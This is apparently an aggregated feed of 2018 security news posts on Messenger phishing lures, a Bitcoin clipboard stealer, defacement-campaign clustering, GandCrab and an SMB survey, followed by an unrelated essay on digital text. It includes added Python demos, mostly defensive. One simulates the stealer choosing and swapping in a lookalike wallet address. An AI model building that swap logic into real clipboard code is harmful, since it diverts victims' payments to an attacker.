
E Hacking News – Latest Hacker News and IT Security News: Facebook Messenger: A Weapon of Cyber Scoundrels?

Facebook Messenger: A Weapon of Cyber Scoundrels?

The FBI has warned that Facebook Messenger is being used by cyber criminals to trick users into opening malicious links.

These links are a pathway for the criminals to the personal data of the user.

The latest trick is simple: the criminals spread a message containing a link that people are highly likely to open.

The FBI's Portland office took note of the scam and released a warning about the latest widespread trickery. The feds initially singled out Facebook Messenger as the single area of concern, but later corrected their statement when traces of the scam showed up on other messaging platforms too.

It is not only Facebook Messenger that is caught up in the scheme; other instant messaging apps are on the list too. The aim of the scam is to obtain users' personal details, such as login credentials for social networking sites like Facebook, by getting them to click on the malicious URLs that arrive in their inboxes.

To lure victims into clicking the shady URL, the message is built around a question: 'Hey I saw this video. Isn't this you?' (Now who could resist that?)

How many people have been victimized by this scam is unknown, and so is exactly what the criminals do with the data afterwards. It is no surprise, though, that stolen login credentials, passwords included, are sold on underground markets.

The link leads to a fraudulent lookalike of the Facebook login page. Victims are deceived into believing they are logging into Facebook, and any details entered there are stolen and could be used to log into other sites where the same credentials are reused. According to the feds, other forms of this scam are more direct and simply ask the victim to fill in their credentials.

A well-known version of the scam reads, 'Alton Towers is giving away 5 free tickets to 500 families.' Another variation read, 'we're giving 5 free passes to 500 families to celebrate our 110th birthday!' The clicker is then directed to an online survey form, which has to be filled in, and is prompted to forward the message to friends within the instant messaging app.

The scam was first uncovered on Facebook Messenger, but WhatsApp and various other applications are now affected as well.
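The lure above works because the link looks like it goes to Facebook while the host that actually serves the lookalike login page is something else. The following is an added example, not code from the article or from the FBI, of the one check that matters: which host does the browser really connect to? The trusted host list, the constructed messages and the domains ending in `.example` are assumptions for the demonstration.

```python
import re
from urllib.parse import urlsplit

# Assumed for this example: hosts a message in this channel is trusted to link to.
TRUSTED_HOSTS = {"facebook.com", "fb.com", "messenger.com"}

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)


def registered_host(url):
    """Return the hostname a browser would actually connect to, lower-cased.

    urlsplit().hostname drops the userinfo part, so a link such as
    https://facebook.com@evil.example resolves to evil.example, not facebook.com.
    """
    try:
        host = urlsplit(url).hostname
    except ValueError:  # malformed URL (e.g. a broken IPv6 literal)
        return None
    return host.lower().rstrip(".") if host else None


def is_trusted_host(host, trusted=TRUSTED_HOSTS):
    """True only for a trusted host itself or one of its real subdomains.

    'facebook.com.video-share.example' and 'facebook-login.example' both fail:
    ownership of a name is decided by its rightmost labels, not by what it starts with.
    """
    if host is None:
        return False
    return any(host == t or host.endswith("." + t) for t in trusted)


def suspicious_links(message, trusted=TRUSTED_HOSTS):
    """Return every URL in a message that does not point at a trusted host."""
    flagged = []
    for url in URL_RE.findall(message):
        url = url.rstrip(".,;:!?)")  # trailing punctuation belongs to the sentence
        if not is_trusted_host(registered_host(url), trusted):
            flagged.append(url)
    return flagged


if __name__ == "__main__":
    # Constructed lure in the style the article quotes; the domain is not real.
    lure = "Hey I saw this video. Isn't this you? https://facebook.com.video-share.example/login"
    print(suspicious_links(lure))
```

The check deliberately ignores everything except the hostname: path, query string and display text are attacker-controlled and are exactly what the lookalike page gets right.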

E Hacking News - Latest Hacker News and IT Security News

E Hacking News – Latest Hacker News and IT Security News: New mechanism for computer hacking

Top cyber threat experts will gather on Wednesday in Las Vegas to discuss at length an artificial intelligence technique that could help hackers bypass multi-layered security measures.

The experts at the upcoming Black Hat security conference are expected to look at computer security from a new perspective, so that the cyber security fraternity can proceed with the necessary care and confidence. Security firms got wind of the impending threat when a team of cyber defence experts from IBM Corp disclosed details of an artificial intelligence technique used to attack computer systems. The speakers will concentrate on the software and its damaging character, to the benefit of the people engaged in cyber defence at many firms.

So far nobody has claimed to have caught such AI-assisted malware in the wild. But according to the researchers, much more is to come, since the issue is a very hard one to handle: detecting the details of the software, or the threat, is a challenging task. What the researchers have demonstrated clearly suggests an effective mechanism for carrying out further attacks against a chosen target. It has the potential to build a programme to carry out a Stuxnet-like attack, such as the one by the US against a uranium enrichment facility in Iran.

Top researchers at IBM said the upcoming demonstrations and revelations will be of great significance over the next couple of years. Therein lies the importance of the summit slated for Wednesday. An earlier conference on an entry-level automated programme took place in New York, where cyber defence experts demonstrated attacks and the approaches that succeeded. Now they say the evil inside these tools needs to be exposed. To sum up, these new machine learning mechanisms seem to have given computer hackers a new advantage.


Cycle OverRide: McGhies is Sold Out

The awesome news – This might be the biggest CycleOverride at Defcon Ride ever!

The bad news – McGhies has rented out so many bikes to all of you they are now sold out.

Looking forward to seeing everyone already signed up bright and early tomorrow!

Cycle OverRide

E Hacking News – Latest Hacker News and IT Security News: A New Malicious Campaign Whip Around $60,000 of Bitcoin

July 2018 saw reports of a newly discovered malicious campaign from FortiGuard Labs. The campaign, dubbed "Bitcoin Stealer", is so far held responsible for stealing roughly $60,000 worth of Bitcoin.

FortiGuard Labs researchers initially came across a threat that, back in April 2018, matched a few detection rules specific to the Jigsaw ransomware; on closer inspection it turned out that the threat, whose assembly name is "BitcoinStealer.exe", did not behave like ransomware at all.

Unlike ransomware, Bitcoin Stealer uses an executable to monitor the infected PC's clipboard for content that looks like a bitcoin address. When it finds one, the malware replaces the copied address with a different one that shares the same leading and trailing characters as the original wallet address.

Using this technique, the malware inserts itself directly into bitcoin transactions and tricks users into transferring cryptocurrency to the wallet of the cybercriminal behind Bitcoin Stealer.

As Techopedia notes, such stealers are cases of clipboard hijacking, an attack technique in which attackers alter clipboard content, typically to redirect browser users to a malicious website. Attackers are also known to use a technique called "pastejacking" to tamper with commands copied from a web browser and pasted into a terminal.

The question now put to security specialists is whether sufficient protection will be provided against such clipboard-modification attacks, given that attackers have a long history of targeting clipboards to steal cryptocurrency or redirect users to malware.
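Why does the "same start and end" trick in the swapped address work, and what check actually defeats it? The following is an added example, not FortiGuard's code or the malware itself: it simulates the clipboard swap the article describes on a plain string, then contrasts the glance a user gives an address with the full comparison a wallet or a clipboard monitor should make. The addresses are sample values for the demonstration, not wallets anyone controls.

```python
import re

# Format-only pattern for the two common address shapes (legacy Base58Check
# starting with 1 or 3, and bech32 starting with bc1). It does not check checksums:
# a swapped-in attacker address is a perfectly valid address, so validity is no defence.
BTC_ADDR_RE = re.compile(
    r"\b(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-z02-9]{25,62})\b"
)


def find_btc_address(text):
    """Return the first Bitcoin address in clipboard text, or None."""
    m = BTC_ADDR_RE.search(text)
    return m.group(0) if m else None


def shared_edges(a, b):
    """(leading, trailing) character counts that two addresses have in common."""
    prefix = 0
    for x, y in zip(a, b):
        if x != y:
            break
        prefix += 1
    suffix = 0
    for x, y in zip(reversed(a), reversed(b)):
        if x != y:
            break
        suffix += 1
    return prefix, suffix


def pick_lookalike(victim_addr, pool):
    """Attacker's choice: the pool address whose start and end best match the victim's."""
    return max(pool, key=lambda cand: sum(shared_edges(victim_addr, cand)))


def hijack_clipboard(clipboard_text, pool):
    """Simulate the stealer: swap any address in the clipboard for a lookalike."""
    victim = find_btc_address(clipboard_text)
    if victim is None:
        return clipboard_text
    return clipboard_text.replace(victim, pick_lookalike(victim, pool))


def glance_check(copied, pasted, n=3):
    """What a user typically does: eyeball the first and last n characters."""
    return copied[:n] == pasted[:n] and copied[-n:] == pasted[-n:]


def verify_paste(copied, pasted):
    """The check that works: the address pasted must equal the address copied, in full."""
    return find_btc_address(copied) == find_btc_address(pasted)


# Sample addresses for the demonstration (assumed values, not live wallets).
VICTIM = "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"
LOOKALIKE = "1BvBq8aWxSNEjt9zXqmNr2ArGx1hZaHVN2"   # same "1BvB" start, same "VN2" end
OTHER = "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy"
ATTACKER_POOL = [OTHER, LOOKALIKE]

if __name__ == "__main__":
    note = "pay 0.5 BTC to " + VICTIM
    swapped = hijack_clipboard(note, ATTACKER_POOL)
    print(swapped)
    print("glance passes:", glance_check(VICTIM, find_btc_address(swapped)))
    print("full compare passes:", verify_paste(note, swapped))
```

The practical takeaway is in the last two lines: a three-character glance at each end passes the lookalike, while comparing the complete string does not. Wallet software that echoes the full destination back for confirmation, or a clipboard monitor that alerts when the clipboard changes without a user copy event, are the defences that follow from this.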


TrendLabs Security Intelligence Blog: How Machine Learning Can Help Identify Web Defacement Campaigns

By Federico Maggi, Marco Balduzzi, Ryan Flores, and Vincenzo Ciancaglini

Website defacement — the act of visibly altering the pages of a website, notably in the aftermath of a political event to advance the political agenda of a threat actor— has been explored in our various research works. We broke down top defacement campaigns in a previous paper and, in another post, emphasized how machine learning in our security research tool can help Computer Emergency Readiness Teams (CERTs)/Computer Security Incident Response Teams (CSIRTs) and web administrators prepare for such attacks. The latter took off from the analysis done in our most recent paper, Web Defacement Campaigns Uncovered: Gaining Insights From Deface Pages Using DefPloreX-NG. Here we expound on why machine learning (ML) was an ideal method for our analysis to better understand how web defacers operate and organize themselves.

Facilitating machine learning techniques with DefPloreX-NG

In 2017, we presented DefPloreX, a machine learning toolkit that can be used for large-scale e-crime forensics. This year, we presented DefPloreX-NG, a version of the toolkit with enhanced machine learning algorithms and new visualization templates. In our recent web defacement paper, we used DefPloreX-NG to go beyond anecdotal evidence and analyze 13 million deface records spanning 19 years. It can also be used by security analysts and researchers to identify ongoing and live web defacement campaigns, including new and so far unknown ones. The improved and expanded toolkit allows for efficient filtering of actionable intelligence from raw deface sites. It can automatically identify and track defacement campaigns and assigns meaningful textual labels for each campaign’s attributes. In addition, it makes it easier to sort and search sites, for example, according to threat actor or group responsible, motivation, type of content or propaganda, top-level domain (TLD), category of defaced site (media outlet, etc.), and others. The processes involved are heavily aided by machine learning.

Figure 1. Diagram of the automated analysis of deface pages using DefPloreX-NG

  • Historical and live dataset: For the research we used a dataset based on a unique collection of defacement records from five major reporting sites. These reporting sites provide feeds of defacement records aggregated from various sources, such as sharing initiatives, CERTs, or victim organizations, among others. As a first step, we had to ensure that the datasets we used were trustworthy,[1] meaning we had to prioritize data on actual site content over metadata. Relying on actual content (such as website, images, text of defacement message, etc.) was key to drawing any meaningful conclusions.
  • Assigning attributes to the featureless dataset: We assigned attributes to the dataset (timestamp of the defacement event, category of the deface site, etc.). From the raw content (e.g., rendered HTML, images or other media files), we extracted a set of characteristics that we could translate into useful features. By assigning these features we were able to capture visual characteristics such as images or dominant colors, geographical ones drawing from languages used, or related to domains which, for example, indicate the ratio of links pointing to cross-origin domains, among others.
  • Clustering based on assigned features: Next, we grouped similar deface pages into clusters based on the features we extracted (see Figure 2). For this purpose we used ML-based data clustering. Similar pages will have similar features and thus will end up being clustered together. Clustering allowed us to organize web incidents into campaigns. Since our dataset contained millions of records, each represented by tens of features, we chose an algorithm that addresses any constraints in available memory and time.

Note: Feature engineering is central to any clustering problem. We identified features that could be extracted to represent a deface page.

Figure 2. Sample deface page and features extracted for clustering

  • Clustering versus classification: We used unsupervised machine learning, i.e., data clustering. The lack of ground truth is the reason why we opted for data clustering as the core of our analysis system, with each deface page serving as an object represented as a tuple of numerical and categorical features.
  • Labels: After clustering, we labeled the clusters and visualized the campaigns in terms of various dimensions (e.g., length of time, actors, targets, topics, etc.). To provide analysts with an explainable and human-readable view of the clustered deface pages, we represented each cluster as a concise report that includes the time span (oldest and newest deface page) and a list of patterns that create a meaningful label of that cluster. These representations, enabled by the toolkit, allowed us not only to recognize defacement in a monitored benign page but also to tell various defacement campaigns apart.
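The pipeline above (extract features from raw page content, cluster by similarity, label each cluster with its shared patterns and time span) is easier to see on a few records. The following is an added example, not DefPloreX-NG's code or its feature set: it uses a handful of features of the kinds the post names (cross-origin link ratio, image count, terms from the message text), a greedy one-pass clustering chosen because the paper stresses memory and time constraints on millions of records, and a cluster report in the same spirit. The three deface pages, their URLs and timestamps are constructed for the demonstration.

```python
import math
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _PageParser(HTMLParser):
    """Collect links, images and visible text from one rendered deface page."""
    def __init__(self):
        super().__init__()
        self.links, self.images, self.text = [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "img" and a.get("src"):
            self.images.append(a["src"])

    def handle_data(self, data):
        self.text.append(data)


def extract_features(url, html):
    """Turn a raw record into numeric features plus a bag of terms."""
    p = _PageParser()
    p.feed(html)
    origin = urlparse(url).netloc.lower()
    cross = [l for l in p.links
             if urlparse(l).netloc and urlparse(l).netloc.lower() != origin]
    terms = set(re.findall(r"[a-z]{4,}", " ".join(p.text).lower()))
    return {
        "cross_origin_ratio": len(cross) / len(p.links) if p.links else 0.0,
        "n_images": min(len(p.images), 10) / 10,   # capped, scaled to [0, 1]
        "n_links": min(len(p.links), 10) / 10,
        "terms": terms,
    }


NUMERIC = ("cross_origin_ratio", "n_images", "n_links")


def distance(f, g):
    """Euclidean distance on numeric features plus (1 - Jaccard) on the term sets."""
    num = math.sqrt(sum((f[k] - g[k]) ** 2 for k in NUMERIC))
    union = f["terms"] | g["terms"]
    jacc = len(f["terms"] & g["terms"]) / len(union) if union else 1.0
    return num + (1.0 - jacc)


def cluster_records(records, threshold=0.5):
    """Greedy leader clustering: one pass, each record joins the first close cluster."""
    clusters = []  # each: {"leader": features, "members": [(record, features)]}
    for rec in records:
        feats = extract_features(rec["url"], rec["html"])
        for c in clusters:
            if distance(c["leader"], feats) <= threshold:
                c["members"].append((rec, feats))
                break
        else:
            clusters.append({"leader": feats, "members": [(rec, feats)]})
    return clusters


def describe_cluster(c):
    """Human-readable report: time span, size and the terms every member shares."""
    stamps = [rec["ts"] for rec, _ in c["members"]]
    common = set.intersection(*(f["terms"] for _, f in c["members"]))
    return {"oldest": min(stamps), "newest": max(stamps),
            "size": len(c["members"]), "label": sorted(common)}


# Constructed sample records (fake domains and dates) standing in for a feed.
PAGE_A = """<html><head><title>Hacked By Team Alpha</title></head><body>
<img src="http://cdn.alpha.example/flag.png"><img src="http://cdn.alpha.example/logo.png">
<h1>Hacked By Team Alpha</h1><p>Free Palestine. Greetz to all members.</p>
<a href="http://team-alpha.example/">Team Alpha</a> <a href="http://zone.example/m">mirror</a>
</body></html>"""
PAGE_B = """<html><head><title>Hacked By Team Alpha</title></head><body>
<img src="http://cdn.alpha.example/flag.png"><img src="http://cdn.alpha.example/logo.png">
<h1>Hacked By Team Alpha</h1><p>Free Palestine. Greetz.</p>
<a href="http://team-alpha.example/">Team Alpha</a> <a href="http://zone.example/m">mirror</a>
</body></html>"""
PAGE_C = """<html><head><title>Owned by Cyber Ghosts</title></head><body>
<h1>Owned by Cyber Ghosts</h1><p>Security is an illusion.</p>
<a href="/contact">contact</a></body></html>"""
RECORDS = [
    {"url": "http://victim-a.example/", "ts": "2015-01-08", "html": PAGE_A},
    {"url": "http://victim-b.example/", "ts": "2015-01-10", "html": PAGE_B},
    {"url": "http://victim-c.example/", "ts": "2015-01-09", "html": PAGE_C},
]

if __name__ == "__main__":
    for c in cluster_records(RECORDS):
        print(describe_cluster(c))
```

Two things carry over to the real problem. The distance mixes a numeric part with a set-similarity part, so a page that copies a team's template but changes one slogan still lands in the team's cluster; and the label is the intersection of member terms, which is what makes a cluster readable to an analyst without any ground truth.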

Sample findings based on common attributes

As mentioned, DefPloreX-NG helps analysts draw details from the analysis of web defacement records, including characteristics of threat actor groups, from what TLDs they target to how they are organized and how they operate. Some of the specific findings we could draw from our analysis included the following:

  • Topics of messages by defacers evolved over time: To see how the messages left by defacers evolved over time, we used an off-the-shelf ML technique called topic modeling, which is widely used in news classification to determine the subject of a story. The topic modeling algorithm can sort a large amount of data (e.g., deface pages) into a small set of high-level concepts or topics. This showed us an evolution of topics defacers cared about, as reflected in major terms mentioned in deface messages that also tied back to real-world events during the time of defacement. For example, in some years, “pope,” “terror,” “country,” “marocain,” and “turk” were among the top terms in deface pages, coinciding with events such as the papal conclave in 2005 or the Turkish general election in 2007. An understanding of the most common topics also allowed us to make some inferences as to the motivations and affiliations of the various threat actors. As revealed by the “marocain” and “terror” keywords, many defacers seem to model themselves as online activists that support religious or sociopolitical ideologies.
  • Similar targets and cooperation: Campaigns that had similar targets often also overlapped in political agenda and/or motivation, revealing how the actors behind them were likely collaborating.

Note: The analysis from DefPloreX-NG shows there are nine campaigns, with each campaign having participants that are either teams or defacers.

Figure 3. Overview of campaigns related to the Charlie Hebdo attack

  • Threat actor overlap: One interesting insight from our analysis was that threat actors behind attacks could be acting as lone wolves, but they also often join forces or cooperate on an ad-hoc basis. Cooperation with other groups can be identified, for example, when two defacement pages use many similar characteristics (such as font size, background color, similar color scheme). Such similarities are a strong attribution indicator, and in turn allow analysts to group defacements together and understand the relationships between groups and actors. We rely on this indicator for our automated approach in detecting and tracking campaigns.
  • Groups vs. single actors: After manually inspecting thousands of deface pages, we found that modern defacers were not simply lone “script kiddies” but tended to have team affiliations. Nearly half of the attackers (47 percent) behind defacement campaigns were affiliated with at least one group; the rest operated solo. Very often, names of the teams as well as their members appeared in the content of deface pages. Most of the campaigns (70 percent) were conducted as a joint operation and not the work of lone wolf attackers.
  • Duration vs. intensity: DefPloreX-NG can automatically label a campaign as long-term or aggressive based on its behavior over time. We found a contrast in how long-term and aggressive campaigns are conducted (see Figure 4). Each cell represents the number of attacks conducted by a campaign per year. Long-term campaigns conduct slower and longer attacks, while aggressive campaigns react to geopolitical events (such as terrorist attacks) and prefer massive attacks conducted a few days after the event.

Figure 4. Long-term campaigns (top) and most intense and aggressive campaigns (bottom)

Defacers leave traces behind and we have shown examples of how we used these traces and machine learning to automate the analysis of millions of cases by grouping individual defacement incidents into categories of similar activity, type, and threat actor responsible. We took a data-driven approach and employed machine learning capabilities to turn unstructured data into meaningful high-level descriptions. Without an automated system, going through 13 million records would have been extremely time- and resource-intensive given the large amount of processing power such a task would have required. We used machine learning in a security tool beyond detection, also building intelligence based on a host of details that can be used for research and other analyses.

To read more about DefPloreX-NG, how it can be used to analyze defacement campaigns, and how ML techniques aided our analysis, see our recent research paper.

[1] The information volunteered by the actors behind defacements is not always reliable, given the risk of misleading information purposefully planted in what they supply.


TrendLabs Security Intelligence Blog

The State of Security: Beware: Real Estate Scams are Growing

What does the chairman of MIT’s board of trustees and a Supreme Court judge for New York State have in common with the Weintraubs of Lebanon, Oregon? They were all victims of real-estate spoofing scams, a form of cyber-security fraud that has grown from $19 million in 2016 to over $1B in 2017. Thieves have […]

The post Beware: Real Estate Scams are Growing appeared first on The State of Security.

The State of Security

Blog | Avast EN: New Wi-Fi attack can crack your passwords | Avast

When you’re using a Wi-Fi network these days, chances are you are counting on one of these protocols: WPA or WPA2. In short, your Wi-Fi signal is protected by the Wi-Fi Protected Access (WPA or WPA2) encryption standard. These wireless industry standards were designed to prevent potential hackers from intercepting the signal and reading your browsing data. Here’s the bad news: it was just reported that, while investigating the new WPA3 standard, a security researcher managed to break the encryption. So what’s the good news? At least now we know.

Blog | Avast EN

Untangle: Untangle Survey Finds SMBs Rank Network Security as Top IT Concern

SMBs Struggle to Combat New Security Threats as Organizations
Increasingly Turn to Cloud Technologies

SAN JOSE, Calif.– August 2, 2018 – Untangle®, Inc., a leader in comprehensive network security for small-to-medium business (SMB), today released the results of their first annual SMB IT Security Report. The findings explore IT security apprehensions for small and mid-size businesses, showing that Firewall/Network rated as the top security concern for these organizations, particularly as they begin to deploy increasing levels of infrastructure to the cloud and provide access to larger numbers of devices across their networks.

SMBs will always face limited budgets and resource constraints when allocating IT security spending, compared to larger enterprises. However, SMBs face a double whammy: they are just as likely as, or more likely than, enterprises to be targeted by cybercriminals, but are less equipped to deal with the fallout of a successful breach. It is imperative that SMBs take a proactive approach instead of waiting to become victims. Untangle conducted a survey polling more than 350 SMBs worldwide to better understand the challenges they face securing their networks, data and users.

The 2018 SMB IT Security Report found that SMBs consistently struggle to deploy IT security solutions with underfunded security budgets and lack of security expertise, with more than half of the organizations surveyed acknowledging they distribute security responsibilities across other roles in the organization. Increasing reliance on cloud infrastructure has also sparked increased concern for network security as more companies plan to, or are researching, SD-WAN solutions.

Key findings from the survey include:

  • Less than 30 percent of SMBs surveyed have a dedicated IT security professional on staff; 50 percent distribute IT security responsibilities across other roles.

  • 75 percent of SMBs surveyed have fewer than five physical locations, but only 60 percent have fewer than 100 end-user devices to manage.

  • Top IT security concerns include budget constraints (47 percent) and limited time to research and understand new threats (37 percent).

  • Of the organizations that experienced an attack in the last 12 months, 33 percent were from phishing attacks, 27 percent from malware and 15 percent from ransomware.

  • 50 percent of organizations polled have IT budgets of $5,000 per year or less; half of those had less than $1,000 per year to spend on security.

“SMBs have less expertise and fewer dollars to dedicate to IT security, but they are the primary target of a growing number of phishing and malware threats, particularly as they move towards more cloud-based tools,” said Scott Devens, chief executive officer at Untangle. “This report confirms that SMBs are in dire need of easy-to-deploy, intuitive solutions to protect their networks that don’t require hiring additional personnel or time-intensive commitments from existing staff.”

Untangle offers complete network security solutions for small and medium businesses with limited IT resources and budgets. NG Firewall, its unified threat management solution, provides a comprehensive solution for content filtering, malware and threat protection, secure Wi-Fi, application control, bandwidth optimization, virtual private networks and more. Known industry-wide for its ease-of-use and comprehensive reporting, NG Firewall is the number one choice of small-to-medium businesses and distributed organizations. NG Firewall is seamlessly integrated with Untangle’s cloud services, including ScoutIQ™ threat intelligence and Command Center centralized management. Command Center lets administrators manage their deployments with ease and convenience from any browser without requiring an on-premise footprint.

For more information about Untangle, please visit Download a free copy of the report here.

About Untangle
Untangle is an innovator in cybersecurity designed specifically for the below-enterprise market, safeguarding businesses, home offices, nonprofits, schools and governmental organizations. Untangle’s integrated suite of software and appliances provides enterprise-grade capabilities and consumer-oriented simplicity to organizations with limited IT resources. Untangle’s award-winning network security solutions are trusted by over 40,000 customers around the world. Untangle is headquartered in San Jose, California. For more information, visit

Media Contact
Lisette Rauwendaal
Lumina PR for Untangle
(408) 827-4363


E Hacking News – Latest Hacker News and IT Security News: GandCrab takes on AhnLab antivirus

The author of the GandCrab ransomware has taken centre stage in security circles this week.

The author reacted after a "vaccine" app for GandCrab, released by the anti-virus vendor AhnLab, became available.

The author contacted BleepingComputer with new information about what would be added in the next versions of the ransomware.

He maintained that GandCrab would soon deny service to AhnLab's anti-virus software.

According to the author, this was payback against AhnLab for launching the vaccine app for GandCrab.

The vaccine app works by placing a file on the computer; an active GandCrab infection checks for that file and, if it is present, does not proceed against the device in question.

In a number of messages to BleepingComputer, the GandCrab author dismissed the vaccine app, called Killswitch, as useless, and did so almost immediately after AhnLab launched it, announcing his new ransomware version at the same time.

Significantly, the author included in the new GandCrab versions exploit code aimed at AhnLab's anti-virus.

BleepingComputer was preparing to publish the story when an AhnLab expert, having examined the code, said the company had little to worry about.

The company observed that its product detects the GandCrab ransomware before the attack code, which triggers a BSOD (blue screen), is ever reached, so the code has little chance of being effective.

AhnLab's experts say the code that has stirred up the security world is nothing but a denial-of-service bug, not a zero-day exploit.

They observed that while the code can cause a BSOD on a system running the AhnLab product, it cannot execute any payload.


Blog | Avast EN: TSMC shut down by WannaCry variant | Avast

Questions still surround the TSMC (Taiwan Semiconductor Manufacturing Company) computer virus incident which shut down operations for the world’s largest semiconductor foundry last Friday, August 3. While the company maintains this was not due to a cyberattack, it also reports that the virus was a variant of WannaCry, the ransomware that terrorized the world last year.


liquid thoughts: A Theoretical Model for Knowledge Work & Symbol Manipulation (4 Aug)

This is an attempt to highlight the inherent interactivity of digital text, the value which can be extracted by realising the interactive potential and areas of investigation.

[first draft]

Textual Knowledge

To look at how we can advance the power of interactive text to augment our knowledge work, we need to look at what text is; how text encodes knowledge, how we decode knowledge from it and how text in a digital substrate is different from text on an analog substrate.

Text : Rule Based Linearly Connected Nodes

Text, whether a single character in a word or a word in a sentence, achieves meaning from other text. This makes text a rule-based ‘nodal’ medium (the word ‘node’ originally meant ‘knot’ and as such only exists as intersections of connections) and this highlights the inherent interactivity of text: Text has no meaning without connection and to extract the maximum utility from text we should investigate what further interactions can be powerfully useful.

Writing is flexible enough to handle all the spoken words in the language it represents and coherent enough that the text may be reliably ‘read’, based on rules. Without the first there would not be much to write down, and without the second the ambiguity threshold would be too high, making the text ‘unreadable’ and undependable as a witness to the author's thoughts.

The connections in text include:

• Connecting different characters using ‘vocalisation’ rules to provide a huge vocabulary.

• Connecting different words using ‘grammar’ rules provides a huge potential for knowledge expression.

• Connecting to external sources through implicit links to give us a wide web of context shared with the reader to tap on.

• Connecting to external sources through explicitly presenting addresses giving us a potential credibility for assertions and arguments if they ‘stack up’ for the reader.

Digital Text

This ‘readability’ is what makes text even more powerful when it exists in a digital substrate, where the screen is only a re-presentation of the symbols in the system, interacted with through layers of pre-designed manipulations, from the digitally native zeros and ones to the beautifully high-resolution lines forming elegant type on your screen. In order to reach your screen the symbols must be interacted with, but this is usually done in advance. The power a user can gain from being given control over the interactions with the symbols is vast.

Weaving Knowledge

With the exception of some specific tasks and professions, working with knowledge on computer systems is primarily ‘literal’: the act of looking, at and for, the connections between textual nodes of knowledge, reforming connections between nodes and packaging them to share new insights, all of which can be seen as acts of weaving knowledge.

I don’t use the term ‘information’ since I think it’s important to keep in mind that authored text is primarily from an author’s mind, not neutral information somehow objectively placed into a document. For the textual knowledge looked at here, we are not looking at ‘dry’ facts but liquid opinions and perspectives of authors and readers and how they can influence change in perspectives or solidify prejudices.

The Author Reader Partnership

The act of authoring is to linearly encode connections between nodes into a linear, frozen text and the act of reading is to decode them and to investigate the logic and credibility of the connections in the text (logical & cited) as well as seeing how they connect to wider, non-explicit contexts. As such, the symbols, the ‘stuff of knowledge’, serve very different purposes when authoring and reading:

• When authoring, the text consists of nodes at various levels of visual linearity which the author needs to linearise.

• When reading the nodes are in a linear order and the reader needs to re-order them to better understand all the connections.

Encoding Knowledge: Authorship

Authorship is Thinking with Symbols to Make a Linear Argument

The act of authorship is the act of choosing which symbols (expressing fresh thoughts, recorded notes or linked citations) should appear in which order in a linear presentation.

This act of choosing and arranging can be done in one fell swoop when writing something the author knows well and which does not require further investigation or thought. The more the author needs to learn about the subject of the text, the more editing will naturally occur as the author thinks while glancing over what she has written so far. In digital environments, thinking and editing become an intimate round trip through the space of symbols, via the computer screen, trackpad and keyboard, and the user's mind.

Research Areas

Basic support for this process includes the ability to drag and drop text and to cut and paste. The opportunities to improve the authorship process remain immense, however: means through which the author can contract and expand lengths of text for easier overviews, and manual and automatic concept-map-like layouts which deliver interactions only digital text can make possible.

As any author who has written anything but the shortest document will know, writing is mentally taxing, with different elements needing to be made available somehow for the author to string together and then re-position while thinking further and seeing how the pieces actually fit. Research questions include finding the best representations of text for different views and interactions.

Potential Benefits of Improvements

Using the processing power of the author’s visual system (the occipital lobe) to augment short-term memory and the higher-level thought of the prefrontal cortex can free up more creative thinking and open up mental space for more critical thinking. This is just the start of what can be done and what we understand. Further research can point to ways in which the higher and lower visual processing pathways can further augment visual thinking.

The Results of Authorship

Authorship Freezes

The use of text to store knowledge is an imperfect and incomplete attempt to freeze the knowledge into a fixed set of rigid symbols in a non-fixed context. We venerate text for its objectivity and longevity, but anyone who has read anything from an older generation, let alone from someone who wrote a few hundred years ago like Shakespeare, is firmly aware of how the context has moved while the text stayed still.

Authoring Confers ‘Authority’

The fixedness of the lines of text and the solidity this confers on what is written, as well as the vast majority of the history of writing associating well-formed (printed) text with great expense and therefore worth, gives 'authority' beyond what is reasonable in a digital environment where writing and distribution can be cheap but consumption expensive, given that the number of sources available to a reader will always vastly outstrip the individual reader's ability to consume and to reply.

Extracting & Evaluating Knowledge : Readership

Readership is Critical Interpretation & the Feeding of Spark Points

For a reader to approach a text with 'an open mind' but without the passivity which would simply 'brainwash' requires a mental space for the reader which is outside the scope of discussions of interactive text (such as the removal of mental loads of different kinds of worries and the educational supplementing of mental tools for interrogation and self-awareness). It is clear, however, that people are much more amenable to 'changing' their minds if they make discoveries on their own rather than being told by someone else. This is a primary reason why providing tools to interact with text that are as rich as possible is crucially important: to be able to deal with the reader's curiosity when sparked, as quickly and easily as possible, before the spark fades, making the text itself so interactive that Socrates would have approved.

Research Areas

The interaction the spark needs to be met by is an interactive reading system where the reader can somehow handle the text fluidly to see different aspects of the text or to navigate through the text’s explicit and implicit connections.

How the reader can most powerfully see different types of connections and interrogate the text provides a wealth of important research opportunities. One experiment I have already done on this is making implicit links effortless to follow, through the Liquid | Flow utility, which highlights the real benefits of simple additions to the reader's interaction arsenal and gives an indication of what can be done with real research and testing.

Potential Benefits of Improvements

To break through this initially frozen visual text (even the most interactive text is visually still until the reader interacts with it) is to set the text free for the reader to literally dive deeper into the text's authored and environmental connections, to more quickly and correctly assign relevance and value to the text, and to better understand the expressed meaning of the text and its wider context.

This rich interaction will be crucial to build a better informed, better connected, more harmonious society, though of course not in isolation from other also crucial efforts.

Connecting Author & Reader : Addressability

In order to do the reading and the writing – in order to weave and unweave – the text must be 'somewhere'; it must be somehow addressable. A key aspect of interactive text then is addressability, since you cannot interact with something which isn't 'there', where 'there' is defined as a specific space which can be addressed, and where this space of the address can be very local or more universal.

The most local and basic addressing is simply having something interactable on a computer screen so that the user can put their cursor over the text, double click (or equivalent) to select it and choose to Copy the text, Spell Check it or something else. Without local addressing the computer would not know where the user's cursor is or where the text is.

Networks of text, colloquially referred to as 'hypertext' in our community, rely on the wider addressability afforded by the domain name system and the world wide web, where text can encode the location of a document on another physical or virtual computer with an address, such as and can then further specify the directory of the document by adding / and the name of the directory, then the name of the document, ending with the type of encoding used, such as .html. If the author of the document has taken care of it, or if the authoring software does it, the address can end with a hash sign denoting an anchor placed inside the text, allowing the reader to follow a link to that very location.

Research Areas

This is a rich opportunity for research and practical implementations since it literally opens up new possibilities for knowledge representation and connection–in short: how we can connect determines the size of the representation of our mental worlds.

liquid thoughts

E Hacking News – Latest Hacker News and IT Security News: Cyber security breached in Reddit

